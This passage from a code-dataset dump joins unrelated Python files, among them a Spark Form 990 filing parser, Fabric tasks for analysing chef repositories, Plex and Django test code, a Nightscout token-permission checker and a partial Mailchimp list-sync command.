# Shared database credentials and the Spark driver context.
cr = Credentials()
sc = SparkContext()
def append(elements, element):
    """Append element to elements, skipping None.

    Uses `is None` (not `== None`) so objects with a permissive custom
    __eq__ are never mistaken for None.
    """
    if element is None:
        return
    elements.append(element)
def extend(elements, element):
    """Extend elements with the items of element, skipping None.

    Uses `is None` (not `== None`) so objects with a permissive custom
    __eq__ are never mistaken for None.
    """
    if element is None:
        return
    elements.extend(element)
def makeSession():
    """Create and return a new SQLAlchemy session bound to the configured
    database engine (connection string comes from the credentials store)."""
    from sqlalchemy import create_engine
    from sqlalchemy.orm import sessionmaker
    engine = create_engine(cr.getEngineStr())
    factory = sessionmaker(bind=engine)
    return factory()
def hasPartOne(filing, session):
    """Return True when the filing already has at least one PartI row.

    Records are loaded transactionally, so a filing with Part I present has
    already been fully processed and can be skipped.
    """
    count = session.query(PartI).filter(PartI.filing == filing).count()
    return count > 0
def parseFilings(filings):
    """Parse the raw XML for each filing and persist the extracted parts.

    Runs on a Spark worker: each partition opens its own DB session.  A
    failure on one filing rolls back and a fresh session is started so one
    bad record does not poison the rest of the partition.
    """
    session = makeSession()
    for filing in filings:
        try:
            if (hasPartOne(filing, session)):
                # Already processed in a previously committed run.
                #print "Skipping filing %s because already processed" % str(filing.id)
                continue
            raw = session.query(RawXML)\
                         .filter(RawXML.filing == filing)[0]
            elements = []
            sLookup = SingletonLookup(session, raw)
            mLookup = MultiLookup(session, raw)
            # Extract every supported schedule/part from the raw XML.
            append(elements, Header(sLookup, filing))
            append(elements, PartI(sLookup, filing))
            extend(elements, iii(mLookup, filing))
            append(elements, PartIV(sLookup, filing))
            append(elements, PartVI(sLookup, filing))
            extend(elements, vii(mLookup, filing))
            append(elements, PartVIII(sLookup, filing))
            append(elements, PartIX(sLookup, filing))
            append(elements, PartX(sLookup, filing))
            append(elements, PartXII(sLookup, filing))
            extend(elements, g1(mLookup, filing))
            extend(elements, l2(mLookup, filing))
            for element in elements:
                session.add(element)
            session.commit()
        except Exception:
            # BUGFIX: was a bare `except:`, which also swallowed
            # KeyboardInterrupt/SystemExit.  Roll back and reopen the
            # session, then move on to the next filing.
            session.rollback()
            session.close()
            session = makeSession()
            continue
    session.close()
# Driver: select all Form 990 filings that have raw XML available, then
# farm the parsing work out across Spark partitions.
session = makeSession()
# `!= None` is intentional here: SQLAlchemy overloads it into IS NOT NULL.
filings = session.query(Filing)\
    .filter(Filing.FormType == "990")\
    .filter(Filing.URL != None)\
    .filter(Filing.raw != None)
# NOTE(review): the query is iterated after session.close() inside
# parallelize -- confirm the results are materialized before the close.
session.close()
sc.parallelize(filings, PARTITIONS)\
    .foreachPartition(parseFilings)
| StarcoderdataPython |
1903464 | <filename>WebMirror/management/rss_parser_funcs/feed_parse_extractBarnnnBlogspotCom.py
def extractBarnnnBlogspotCom(item):
    '''
    Parser for 'barnnn.blogspot.com'
    '''
    if 'Voice Drama' in item['tags']:
        return None
    title = item['title']
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
    if not (chp or vol) or "preview" in title.lower():
        return None
    # Infer the volume number from the series name when it is missing.
    if vol is None and 'Lower Bound Volume' in title:
        vol = 2
    if vol is None and 'Upper Bound Volume' in title:
        vol = 1
    # (tag, canonical series name, translation type)
    tagmap = [
        ('yuri in which the world will end in ten days', 'yuri in which the world will end in ten days', 'translated'),
        ('Monster Hunter: Cross Soul', 'Monster Hunter: Cross Soul', 'translated'),
        ('The Girl Who Ate The Death God', 'The Girl Who Ate The Death God', 'translated'),
        ('kino\'s journey', 'Kino\'s Journey', 'translated'),
        ('Cross Road', 'Cross Road: In Their Cases', 'translated'),
    ]
    for tagname, name, tl_type in tagmap:
        if tagname in item['tags']:
            return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
    return False
6584590 | <reponame>learningequality/sushi-chef-content-automation-scripts
import functools
import json
import os
import requirements
import tempfile
import xmlrpc.client
from fabric.api import env, task, local
from fabric.colors import red, green, blue, yellow
from fabric.context_managers import hide, lcd
from fabric.utils import puts
from .github import get_chef_repos
class FabricException(Exception):  # Generic Exception for using Fabric Errors
    pass

# Make Fabric raise FabricException instead of aborting the process, so
# failed local() commands can be caught with try/except.
env.abort_exception = FabricException


# LOCAL CHEF REPOS CHECKOUT
################################################################################

# All chef repositories are cloned under this directory.
CHEF_REPOS_DIR = 'chefrepos'
if not os.path.exists(CHEF_REPOS_DIR):
    os.mkdir(CHEF_REPOS_DIR)
# A dict of header --> attrpath associations to use when printing the report
REPORT_FIELDS_TO_PRINT = {
'repo_name': 'repo_name',
'branch': 'branch',
'requirements.txt': 'requirements_check.verdict',
'sushichef.py': 'sushichef_check.verdict',
'pyfiles': 'cloc_data.Python.nFiles',
'pyLOC': 'cloc_data.Python.code',
'md': 'cloc_data.Markdown.code',
'Bash': 'cloc_data.Bourne Shell.code',
'js': 'cloc_data.JavaScript.code',
'JSON': 'cloc_data.JSON.code',
'HTML': 'cloc_data.HTML.code',
'CSS': 'cloc_data.CSS.code',
# 'Comments': manually added containing combined comments from all reports
}
# CODE REPORTS
################################################################################
@task
def analyze_chef_repo(nickname, repo_name=None, organization='learningequality', branch='master', printing=True):
    """
    Run chef repo convention checks and count LOC for a given chef repo.
    """
    if repo_name is None:
        repo_name = 'sushi-chef-' + nickname
    chef_repo_dir = os.path.join(CHEF_REPOS_DIR, repo_name)
    # Clone on first use, otherwise fast-forward to the requested branch.
    if not os.path.exists(chef_repo_dir):
        local_setup_chef(None, repo_name=repo_name, organization=organization, branch=branch)
    else:
        local_update_chef(None, repo_name=repo_name, branch=branch)

    # The "report" for the chef repo is a dict of checks and data
    report = {
        'repo_name': repo_name,
        'branch': branch,
    }

    # requirements.txt report
    requirements_check = check_requirements_txt(repo_name, branch=branch)
    report['requirements_check'] = requirements_check

    # sushichef.py report
    sushichef_check = check_sushichef_py(repo_name, branch=branch)
    report['sushichef_check'] = sushichef_check

    # cloc
    cloc_data = run_cloc_in_repo(repo_name)
    report['cloc_data'] = cloc_data

    if printing:
        print_code_reports([report])
    return report
@task
def analyze_chef_repos(allbranches=False):
    """
    Run chef repo convention checks on all repos (based on local code checkout).
    """
    # Fabric passes task arguments as strings; treat only 'true' as True.
    allbranches = (allbranches and allbranches.lower() == 'true')
    chef_repos = get_chef_repos()
    reports = []
    for i, chef_repo in enumerate(chef_repos):
        organization = chef_repo.owner.login
        repo_name = chef_repo.name
        if allbranches:
            # Analyze every branch of the repo, not just master.
            branches = list(chef_repo.get_branches())
            for branch in branches:
                report = analyze_chef_repo(None, repo_name=repo_name, organization=organization, branch=branch.name, printing=False)
                reports.append(report)
        else:
            report = analyze_chef_repo(None, repo_name=repo_name, organization=organization, branch='master', printing=False)
            reports.append(report)
    print_code_reports(reports)
# CHEF REPO CONVENTION CHECKS
################################################################################
def check_requirements_txt(repo_name, branch='master'):
    """
    Check if repo contains a file `requirements.txt` and if ricecooker version
    in it is up to date.  Returns a subreport dict with a 'verdict' emoji and
    optionally a 'comment'.
    """
    chef_repo_dir = os.path.join(CHEF_REPOS_DIR, repo_name)
    requirements_txt = os.path.join(chef_repo_dir, 'requirements.txt')
    if not os.path.exists(requirements_txt):
        return {'verdict': '❌'}
    else:
        # get the latest version of ricecooker from PyPI
        # NOTE(review): the PyPI XML-RPC API is deprecated -- confirm this
        # endpoint still responds, or migrate to the JSON API.
        pypi = xmlrpc.client.ServerProxy('https://pypi.python.org/pypi')
        latest_ricecooker_version = pypi.package_releases('ricecooker')[0]
        # compare with version in requirements.txt
        with open(requirements_txt, 'r') as reqsf:
            found = False
            for req in requirements.parse(reqsf):
                if req.name.lower() == 'ricecooker':
                    found = True
                    if not req.specs:
                        return {'verdict': '✅ *'}  # not pinned so will be latest
                    else:
                        reln, version = req.specs[0]  # we assume only one spec
                        if reln == '==':
                            if version == latest_ricecooker_version:
                                return {'verdict': '✅'}  # latest and greatest
                            if version != latest_ricecooker_version:
                                return {
                                    'verdict': version + ' ⬆️',  # needs upgrade
                                    'comment': 'Ricecooker needs to be updated',
                                }
                        else:
                            return {'verdict': '✅ >='}  # >= means is latest
            if not found:
                return {'verdict': '❌'}
def check_sushichef_py(repo_name, branch='master'):
    """Verify that the repo has a `sushichef.py` entry point.

    Returns a subreport dict with a 'verdict' emoji and, when other Python
    files exist in the repo root, a 'comment' listing them.
    """
    repo_dir = os.path.join(CHEF_REPOS_DIR, repo_name)
    py_files = [name for name in os.listdir(repo_dir) if name.endswith('.py')]
    has_entry_point = 'sushichef.py' in py_files
    if has_entry_point:
        py_files.remove('sushichef.py')
    subreport = {'verdict': '✅' if has_entry_point else '❌'}
    if py_files:
        subreport['comment'] = 'Python files: ' + ', '.join(py_files)
    return subreport
# REPORT HELPERS
################################################################################
def rget(dict_obj, attrpath):
    """
    A fancy version of `get` that allows getting dot-separated nested attributes
    like `license.license_name` for use in tree comparisons attribute mappings.
    Returns None as soon as any intermediate value is missing or None, instead
    of raising.  This code is inspired by solution in
    https://stackoverflow.com/a/31174427.
    """
    current = dict_obj
    for attr in attrpath.split('.'):
        if current is None:
            return None
        current = current.get(attr)
    return current
def print_code_reports(reports):
    """
    Print a table with the attributes REPORT_FIELDS_TO_PRINT from the `report`s.
    """
    # 0. compute max length of each column so that the table will look nice
    max_lens = {}
    for header, attrpath in REPORT_FIELDS_TO_PRINT.items():
        lens = [len(header)]
        for report in reports:
            val = rget(report, attrpath)
            val_str = str(val) if val else ''
            lens.append(len(val_str))
        max_lens[header] = max(lens)

    # 1. print header line
    header_strs = []
    for header in REPORT_FIELDS_TO_PRINT.keys():
        max_len = max_lens[header]
        header_str = header.ljust(max_len)
        header_strs.append(header_str)
    header_strs.append('Comments')
    print('\t'.join(header_strs))

    # 2. print report lines
    for report in reports:
        # extract comments from any dict-valued subreports
        # BUGFIX: report values also include plain strings (repo_name,
        # branch); `'comment' in subreport` on a string is a substring test
        # and indexing a matching string would raise TypeError.
        comments = []
        for subreport in report.values():
            if isinstance(subreport, dict) and 'comment' in subreport:
                comments.append(subreport['comment'])
        combined_comments = '; '.join(comments)

        report_strs = []
        for header, attrpath in REPORT_FIELDS_TO_PRINT.items():
            max_len = max_lens[header]
            val = rget(report, attrpath)
            val_str = str(val) if val else ''
            report_str = val_str.ljust(max_len)
            if '⬆️' in report_str:
                # The emoji renders double-width; pad to keep columns aligned.
                report_str += ' '
            report_strs.append(report_str)
        report_strs.append(combined_comments)
        print('\t'.join(report_strs))
# CODE ANALYSIS
################################################################################
def run_cloc_in_repo(repo_name):
    """Run the `cloc` line counter in the repo and return its parsed JSON
    output (a dict keyed by language), or None if cloc is not installed."""
    try:
        with hide('running', 'stdout', 'stderr'):
            local('which cloc')
    except FabricException:
        puts(red('command line tool cloc not found. Please install cloc.'))
        return
    chef_repo_dir = os.path.join(CHEF_REPOS_DIR, repo_name)
    # json tempfile file to store cloc output
    with tempfile.NamedTemporaryFile(suffix='.json') as tmpf:
        with lcd(chef_repo_dir), hide('running', 'stdout', 'stderr'):
            # Skip any virtualenv checked into the repo.
            local('cloc --exclude-dir=venv . --json > ' + tmpf.name)
        with open(tmpf.name) as jsonf:
            cloc_data = json.load(jsonf)
    return cloc_data
# LOCAL CHEF SETUP
################################################################################
@task
def local_setup_chef(nickname, repo_name=None, cwd=None, organization='learningequality', branch='master'):
    """
    Locally git-clone the repo `sushi-chef-{nickname}` to the dir `chefrepos/`.
    """
    # NOTE(review): the `cwd` parameter is accepted but never used -- confirm
    # whether it can be dropped or should be honoured.
    if repo_name is None:
        repo_name = 'sushi-chef-' + nickname
    chef_repo_dir = os.path.join(CHEF_REPOS_DIR, repo_name)
    github_ssh_url = 'git@github.com:{}/{}.git'.format(organization, repo_name)
    if os.path.exists(chef_repo_dir):
        puts(yellow('Chef repo dir ' + chef_repo_dir + ' already exists.'))
        puts(yellow('You can use `local_update_chef` task to update code.'))
        return
    # clone the repo
    with lcd(CHEF_REPOS_DIR):
        local('git clone --quiet ' + github_ssh_url)
    # checkout the desired branch
    with lcd(chef_repo_dir):
        local('git checkout ' + branch)
    puts(green('Setup code from ' + github_ssh_url + ' in ' + chef_repo_dir))
@task
def local_unsetup_chef(nickname, repo_name=None):
    """
    Remove the local repo `chefrepos/sushi-chef-{nickname}`.
    """
    if repo_name is None:
        repo_name = 'sushi-chef-' + nickname
    chef_repo_dir = os.path.join(CHEF_REPOS_DIR, repo_name)
    # Guard clause: nothing to do when the checkout is absent.
    if not os.path.exists(chef_repo_dir):
        puts(yellow('Directory ' + chef_repo_dir + ' does not exist.'))
        return
    local('rm -rf ' + chef_repo_dir)
    puts(green('Removed chef directory ' + chef_repo_dir))
@task
def local_update_chef(nickname, repo_name=None, cwd=None, branch='master'):
    """
    Run pull -f in the local chef repo to update the code to the lastest version.
    """
    # NOTE(review): the `cwd` parameter is accepted but never used -- confirm
    # whether it can be dropped or should be honoured.
    if repo_name is None:
        repo_name = 'sushi-chef-' + nickname
    chef_repo_dir = os.path.join(CHEF_REPOS_DIR, repo_name)
    puts(green('Updating ' + chef_repo_dir + ' to branch ' + branch))
    with lcd(chef_repo_dir), hide('running', 'stdout', 'stderr'):
        # Hard reset: local modifications in the checkout are discarded.
        local('git fetch origin ' + branch)
        local('git checkout ' + branch)
        local('git reset --hard origin/' + branch)
3476301 | from unittest import TestCase
from services.textrank import _word_graph, _sentence_graph
# Fixture: five tokenized "sentences" (song lyrics) with heavily shared
# vocabulary, used by both graph-construction tests below.
_sentences = [
    ['Every', 'breath', 'you', 'take'],
    ['Every', 'move', 'you', 'make'],
    ['Every', 'bond', 'you', 'break'],
    ['Every', 'step', 'you', 'take'],
    ['I', 'll', 'be', 'watching', 'you']
]
class TestGraphCreation(TestCase):
    """Unit tests for the textrank graph builders."""

    def test_word_graph(self):
        # Words co-occurring within a sentence become connected nodes.
        g = _word_graph(_sentences)
        self.assertEqual(len(g.nodes), 13)
        self.assertEqual(
            set(g.neighbors('Every')),
            {'bond', 'break', 'breath', 'make', 'move', 'step', 'take', 'you'}
        )

    def test_sentence_graph(self):
        # One node per sentence; the expected edge set is the complete graph
        # on the five fixture sentences.
        g = _sentence_graph(_sentences)
        self.assertEqual(len(g.nodes), 5)
        self.assertEqual(
            set(g.edges),
            {(0, 1), (0, 2), (0, 3), (0, 4), (1, 2), (1, 3), (1, 4), (2, 3), (2, 4), (3, 4)}
        )
8099664 | from plex import Plex
from tests.core.helpers import read
import responses
# Set client configuration defaults
# (point the client at the mocked host so no real Plex server is needed)
Plex.configuration.defaults.server(host='mock')
@responses.activate
def test_get_all():
    # Stub the /:/prefs endpoint with a canned XML fixture.
    responses.add(
        responses.GET, 'http://mock:32400/:/prefs',
        body=read('fixtures/prefs.xml'), status=200,
        content_type='application/xml'
    )

    container = Plex[':/prefs'].get()
    assert container is not None

    items = list(container)
    assert len(items) == 3

    # Validate preferences match the fixture contents and ordering.
    assert items[0].id == "FriendlyName"
    assert items[0].group == 'general'

    assert items[1].id == "collectUsageData"
    assert items[1].group == 'general'

    assert items[2].id == "FSEventLibraryUpdatesEnabled"
    assert items[2].group == 'library'
@responses.activate
def test_get_single():
    """Fetching :/prefs with a key returns only that preference."""
    responses.add(
        responses.GET, 'http://mock:32400/:/prefs',
        body=read('fixtures/prefs.xml'), status=200,
        content_type='application/xml'
    )
    item = Plex[':/prefs'].get('FriendlyName')
    assert item is not None
    # Validate the single preference.
    assert (item.id, item.group) == ("FriendlyName", 'general')
@responses.activate
def test_set():
    """Setting a preference issues exactly one PUT to :/prefs."""
    responses.add(
        responses.PUT, 'http://mock:32400/:/prefs',
        body='', status=200,
        content_type='application/xml'
    )
    Plex[':/prefs'].set('FriendlyName', 'Mock Server')
    request_count = len(responses.calls)
    assert request_count == 1
| StarcoderdataPython |
5175653 | <reponame>webclinic017/koapy
from koapy.backend.kiwoom_open_api_plus.core.KiwoomOpenApiPlusTypeLibSpec import (
DISPATCH_CLSID,
EVENT_CLSID,
TYPELIB_SPEC,
)
from koapy.utils.pywin32 import BuildOleItems, LoadTypeLib
# Load the Kiwoom OpenAPI+ COM type library once at import time and build
# the pywin32 item tables from it.
TYPELIB = LoadTypeLib(TYPELIB_SPEC)
OLE_ITEMS, ENUM_ITEMS, RECORD_ITEMS, VTABLE_ITEMS = BuildOleItems(TYPELIB_SPEC, TYPELIB)
# Convenience handles for the control's dispatch and event interfaces.
DISPATCH_OLE_ITEM = OLE_ITEMS.get(DISPATCH_CLSID)
EVENT_OLE_ITEM = OLE_ITEMS.get(EVENT_CLSID)
| StarcoderdataPython |
6440095 | <gh_stars>0
import pytest
from modules.feedback.models import Feedback, FeedbackScoreField, FeedbackField
from modules.statistics.models.utils.update_users_statistics import update_user_stats
from modules.packages.models import Package, MissionPackages
from tasks.consts import IN_PROGRESS, VERIFICATION, FINISHED
from tasks.controllers.annotation_controller import AnnotationController
from tasks.models import (
Mission, Task, Item, ItemTemplate, ItemTemplateField, Annotation)
from users.models import EndWorker
from modules.order_strategy.models import Strategy
def add_annotation(item, user, value):
    """Create and return an Annotation whose payload is {"output": value}."""
    payload = {"output": value}
    return Annotation.objects.create(item=item, user=user, data=payload)
@pytest.fixture
@pytest.mark.django_db
def user1():
    """A superuser fixture with username "user1"."""
    return EndWorker.objects.create_superuser("<EMAIL>", "password", username="user1")
@pytest.fixture
@pytest.mark.django_db
def user2():
    """A superuser fixture with username "user2"."""
    return EndWorker.objects.create_superuser("<EMAIL>", "password", username="user2")
@pytest.fixture
@pytest.mark.django_db
def tasks():
    """Create 3 missions with 6 tasks and 13 packages in assorted states."""
    Strategy.register_values()
    strategy = Strategy.objects.get(name="StaticStrategyLogic")
    # Three missions; note missions 2 and 3 deliberately share a name.
    mission1 = Mission.objects.create(name="Test mission 1")
    mission2 = Mission.objects.create(name="Test mission 2")
    mission3 = Mission.objects.create(name="Test mission 2")
    # One package container per mission, all capped at 10 annotations.
    mission1_package = MissionPackages.objects.create(mission=mission1, strategy=strategy, max_annotations=10)
    mission2_package = MissionPackages.objects.create(mission=mission2, strategy=strategy, max_annotations=10)
    mission3_package = MissionPackages.objects.create(mission=mission3, strategy=strategy, max_annotations=10)
    Task.objects.create(mission=mission1, name="Task 1", strategy=strategy)
    Task.objects.create(mission=mission1, name="Task 2", strategy=strategy)
    Task.objects.create(mission=mission1, name="Task 3", strategy=strategy)
    Task.objects.create(mission=mission2, name="Task 4", strategy=strategy)
    Task.objects.create(mission=mission2, name="Task 5", strategy=strategy)
    Task.objects.create(mission=mission3, name="Task 6", strategy=strategy)
    # Packages in a mix of lifecycle states (default, IN_PROGRESS,
    # VERIFICATION, FINISHED) so status-dependent queries can be exercised.
    Package.objects.create(name="Package 1", parent=mission1_package)
    Package.objects.create(name="Package 2", parent=mission1_package)
    Package.objects.create(name="Package 3", parent=mission1_package, status=IN_PROGRESS)
    Package.objects.create(name="Package 4", parent=mission1_package, status=VERIFICATION)
    Package.objects.create(name="Package 5", parent=mission1_package, status=FINISHED)
    Package.objects.create(name="Package 6", parent=mission1_package, status=FINISHED)
    Package.objects.create(name="Package 7", parent=mission2_package)
    Package.objects.create(name="Package 8", parent=mission2_package)
    Package.objects.create(name="Package 9", parent=mission2_package)
    Package.objects.create(name="Package 10", parent=mission2_package, status=IN_PROGRESS)
    Package.objects.create(name="Package 11", parent=mission3_package, status=VERIFICATION)
    Package.objects.create(name="Package 12", parent=mission3_package, status=FINISHED)
    Package.objects.create(name="Package 13", parent=mission3_package, status=FINISHED)
@pytest.fixture
@pytest.mark.django_db
def tasks_items(tasks):
    """Attach one templated Item per package to "Task 1" and "Task 4"."""
    task1 = Task.objects.get(name="Task 1")
    task4 = Task.objects.get(name="Task 4")
    template = ItemTemplate.objects.create(name="Test template")
    first_field = ItemTemplateField.objects.create(name="first", widget="TextLabel")
    template.fields.add(first_field)
    # The editable, required "output" field is where annotations are written.
    annotation_field = ItemTemplateField.objects.create(name="output", widget="TextLabel",
                                                        required=True, editable=True)
    template.fields.add(annotation_field)
    # One item per package of each task's mission, ordered by position.
    for i, document in enumerate(task1.mission.packages.packages.all()):
        Item.objects.create(task=task1, template=template, order=i,
                            data={first_field.name: i}, package=document)
    for i, document in enumerate(task4.mission.packages.packages.all()):
        Item.objects.create(task=task4, template=template, order=i,
                            data={first_field.name: i}, package=document)
@pytest.fixture
@pytest.mark.django_db
def tasks_annotations():
    """
    Build a mission with 10 items and 14 users, annotate each item according
    to the vote matrix below, then run feedback processing and stats updates.

    Each row of `data` describes one item; column j holds the number of users
    who answered j for that item (every row sums to 14 voters).
    """
    data = [[0, 0, 0, 0, 14],
            [0, 0, 0, 12, 2],
            [0, 0, 0, 8, 6],
            [0, 3, 9, 2, 0],
            [0, 0, 12, 1, 1],
            [12, 2, 0, 0, 0],
            [3, 10, 1, 0, 0],
            [14, 0, 0, 0, 0],
            [10, 0, 2, 2, 0],
            [0, 0, 13, 0, 1]]
    Strategy.register_values()
    strategy = Strategy.objects.get(name="StaticStrategyLogic")
    mission = Mission.objects.create(name="Test mission 4")
    mission_package = MissionPackages.objects.create(mission=mission, strategy=strategy, max_annotations=10)
    mission_package.max_annotations = 7
    mission_package.save()
    task = Task.objects.create(mission=mission, name="Task 1", strategy=strategy)
    template = ItemTemplate.objects.create(name="Test template")
    first_field = ItemTemplateField.objects.create(name="first", widget="TextLabel")
    template.fields.add(first_field)
    annotation_field = ItemTemplateField.objects.create(name="output", widget="TextLabel",
                                                        required=True, editable=True, feedback=True)
    template.fields.add(annotation_field)
    FeedbackScoreField.register_values()
    FeedbackField.register_values()
    feedback = Feedback.objects.create(task=task)
    feedback.fields.add(FeedbackField.objects.get(name="VoteRanking"))
    feedback.score_fields.add(FeedbackScoreField.objects.get(name="VotingScore"))
    documents = {}
    for i in range(len(data)):
        documents[i] = Package.objects.create(name="Doc{}".format(i), parent=mission_package)
    users = {}
    for i in range(14):
        # Bug fix: this call was syntactically mangled upstream
        # ('create_user("<EMAIL>), ...' did not parse). Give each user a
        # unique, well-formed address instead.
        users[i] = EndWorker.objects.create_user("user_{}@example.com".format(i),
                                                 "password",
                                                 username="user_{}".format(i))
        users[i].stats  # accessing the property lazily creates the user stats
        users[i].get_mission_stats(mission.id)
    for i, row in enumerate(data):
        item = Item.objects.create(task=task, template=template, package=documents[i],
                                   data={first_field.name: i}, order=i)
        counter = 0
        for j, count in enumerate(row):
            for _ in range(count):
                Annotation.objects.create(item=item,
                                          user=users[counter],
                                          data={annotation_field.name: j})
                counter += 1
    for annotation in Annotation.objects.all():
        AnnotationController().process(annotation)
    update_user_stats()
@pytest.fixture
@pytest.mark.django_db
def two_missions(tasks_items, user1):
    """Annotate the first item of Task 1 and of Task 4 with "A" as user1."""
    for task_name in ("Task 1", "Task 4"):
        first_item = Item.objects.filter(task__name=task_name).first()
        add_annotation(first_item, user1, "A")
| StarcoderdataPython |
6570925 | #!/usr/bin/env python3
# pip3 install requests
import requests
import json
import logging
import argparse
import configparser
import sys
import re
from urllib.parse import urlsplit
import time
# Module state filled in by parse_ns_ini() and
# get_nightscout_authorization_token() below.
nightscout_host=None # will be read from ns.ini
api_secret=None # will be read from ns.ini
token_secret=None # will be read from ns.ini
token_dict={}
token_dict["exp"]=-1  # "expired" sentinel until a real token is fetched
auth_headers={}
def init(args):
    """Configure root logging to stdout; DEBUG level when --verbose is set."""
    level = logging.DEBUG if args.verbose else logging.INFO
    logging.basicConfig(level=level, stream=sys.stdout,
                        format='%(asctime)s %(levelname)s %(message)s')
def parse_ns_ini(filename):
    """
    Read Nightscout connection settings from an openaps ns.ini file.

    Populates the module globals `nightscout_host`, `api_secret` and
    `token_secret` from the `args` line of the [device "ns"] section.
    Exits the process with status 1 on any validation failure.
    """
    global nightscout_host, api_secret, token_secret
    logging.debug("Parsing %s" % filename)
    config = configparser.ConfigParser()
    try:
        with open(filename) as f:
            # Bug fix: ConfigParser.readfp() was removed in Python 3.12;
            # read_file() is the supported replacement (available since 3.2).
            config.read_file(f)
    except IOError:
        logging.error("Could not open %s" % filename)
        sys.exit(1)
    for section in config.sections():
        if section == 'device "ns"':
            for option in config.options(section):
                if option == 'args':
                    argsline = config.get(section, option).split(" ")
                    logging.debug("args=%s" % argsline)
                    if argsline[0] != "ns":
                        logging.error("Invalid ini file. First argument should be 'ns'")
                        sys.exit(1)
                    nightscout_host = argsline[1]
                    api_secret = argsline[2]
    if nightscout_host is None:
        # (Also fixed a stray quote that used to trail this message.)
        logging.error("Nightscout set not found in %s" % filename)
        sys.exit(1)
    if not api_secret.startswith('token='):
        logging.error("API_SECRET in %s should start with 'token='" % filename)
        sys.exit(1)
    # API_SECRET has the form "token=<subject>-<16 lowercase hex/alnum chars>".
    p = re.compile("^token=(?P<token>[a-z0-9_]+-[a-z0-9]{16}).*")
    m = p.match(api_secret)
    if m:
        token_secret = m.group('token')  # extract token from API_SECRET field
    else:  # did not match regexp
        logging.error("Token is not valid in %s" % filename)
        sys.exit(1)
def get_nightscout_authorization_token():
    """Fetch an authorization token from Nightscout and cache it in token_dict."""
    global nightscout_host, token_secret, token_dict, auth_headers
    logging.debug("get_nightscout_authorization_token")
    url = nightscout_host + "/api/v2/authorization/request/" + token_secret
    try:
        response = requests.get(url)
        if response.status_code != 200:
            logging.error("status_code: %d. Response: %s" % (response.status_code, response.text))
            logging.error("Could not connect to Nightscout. Please check permissions")
            sys.exit(1)
        # Save the authorization payload (including its 'exp' expiry stamp).
        token_dict = response.json()
        logging.debug("token_dict=%s" % token_dict)
        logging.debug("authorization valid until @%d " % token_dict['exp'])
        logging.info("Succesfully got Nightscout authorization token")
    except Exception as e:
        logging.error("Could not get_nightscout_authorization_token")
        logging.debug("Exception: %s" %e)
        sys.exit(1)
def startup_checks(args):
    """Parse ns.ini, then obtain an authorization token; exits on any failure."""
    parse_ns_ini(args.nsini)
    logging.info("Nightscout host: %s" % nightscout_host)
    get_nightscout_authorization_token()
def check_permissions():
    """Warn on the admin role; exit(1) if any required API permission is absent."""
    global token_dict
    pg = token_dict['permissionGroups'][0]
    if pg == ["*"]:  # admin role
        logging.warning("The use of the admin role for token based authentication is not recommended, see https://openaps.readthedocs.io/en/master/docs/walkthrough/phase-1/nightscout-setup.md#switching-from-api_secret-to-token-based-authentication-for-your-rig")
    else:
        required = ["api:treatments:read", "api:treatments:create",
                    "api:treatments:read", "api:treatments:create",
                    "api:devicestatus:read", "api:devicestatus:create"]
        missing = []
        for perm in required:
            logging.debug("Checking %s" % perm)
            if perm not in pg:
                missing.append(perm)
        if missing:
            logging.error("The following permissions are missing in Nightscout: %s" % missing)
            logging.error("Please follow instructions at https://openaps.readthedocs.io/en/master/docs/walkthrough/phase-1/nightscout-setup.md#switching-from-api_secret-to-token-based-authentication-for-your-rig")
            sys.exit(1)
    logging.info("All permissions in Nightscout are ok")
if __name__ == '__main__':
    try:
        # CLI: optional verbosity flag and the path to the openaps ns.ini.
        parser = argparse.ArgumentParser(description='Checks permissions in Nightscout based on your ns.ini')
        parser.add_argument('-v', '--verbose', action="store_true", help='increase output verbosity')
        parser.add_argument('--nsini', type=str, help='Path to ns.ini' , default='./ns.ini')
        args = parser.parse_args()
        init(args)
        startup_checks(args)
        check_permissions()
    except Exception:
        # Last-resort handler so unexpected failures are logged, not dumped raw.
        logging.exception("Exception in %s" % __name__)
| StarcoderdataPython |
1717056 | ########################################################
# <NAME> - drigols #
# Last update: 07/11/2021 #
########################################################
class Person:
    """A person with a name, optional age, an eye count, and a nationality."""

    def __init__(self, nome, idade=None, numero_olhos=2, naturalidade="Brazil"):
        self.nome, self.idade = nome, idade
        self.numero_olhos, self.naturalidade = numero_olhos, naturalidade
if __name__ == "__main__":
    # Quick demo: instantiate with defaults and dump the attribute dict.
    p = Person('Rodrigo')
    print(p.__dict__)
| StarcoderdataPython |
1764553 | """
Synchronizes a mailchimp list with the students of a course.
"""
import itertools
import logging
import math
import random
from collections import namedtuple
from itertools import chain
from django.core.management.base import BaseCommand
from mailsnake import MailSnake
from opaque_keys.edx.keys import CourseKey
from common.djangoapps.student.models import UserProfile, unique_id_for_user
# Page size used when reading list members back from the Mailchimp API.
BATCH_SIZE = 15000
# If you try to subscribe with too many users at once
# the transaction times out on the mailchimp side.
SUBSCRIBE_BATCH_SIZE = 1000
log = logging.getLogger('edx.mailchimp')
# Merge-tag field types that differ from the default 'number'.
FIELD_TYPES = {'EDX_ID': 'text'}
class Command(BaseCommand):
    """
    Synchronizes a mailchimp list with the students of a course.
    """
    help = 'Synchronizes a mailchimp list with the students of a course.'

    def add_arguments(self, parser):
        parser.add_argument('--key',
                            required=True,
                            help='mailchimp api key')
        parser.add_argument('--list',
                            dest='list_id',
                            required=True,
                            help='mailchimp list id')
        parser.add_argument('--course',
                            dest='course_id',
                            required=True,
                            help='edx course_id')
        parser.add_argument('--segments',
                            dest='num_segments',
                            type=int,
                            default=0,
                            help='number of static random segments to create')

    def handle(self, *args, **options):
        """Synchronizes a mailchimp list with the students of a course."""
        key = options['key']
        list_id = options['list_id']
        course_id = options['course_id']
        num_segments = options['num_segments']
        log.info('Syncronizing email list for %s', course_id)
        mailchimp = connect_mailchimp(key)
        # Current list membership split by subscription state.
        subscribed = get_subscribed(mailchimp, list_id)
        unsubscribed = get_unsubscribed(mailchimp, list_id)
        cleaned = get_cleaned(mailchimp, list_id)
        # Addresses that must never be (re-)subscribed.
        non_subscribed = unsubscribed.union(cleaned)
        enrolled = get_enrolled_students(course_id)
        exclude = subscribed.union(non_subscribed)
        to_subscribe = get_student_data(enrolled, exclude=exclude)
        # Ensure every merge tag used by the student data exists on the list.
        tag_names = set(chain.from_iterable(list(d.keys()) for d in to_subscribe))
        update_merge_tags(mailchimp, list_id, tag_names)
        subscribe_with_data(mailchimp, list_id, to_subscribe)
        # Drop subscribers who are no longer actively enrolled in the course.
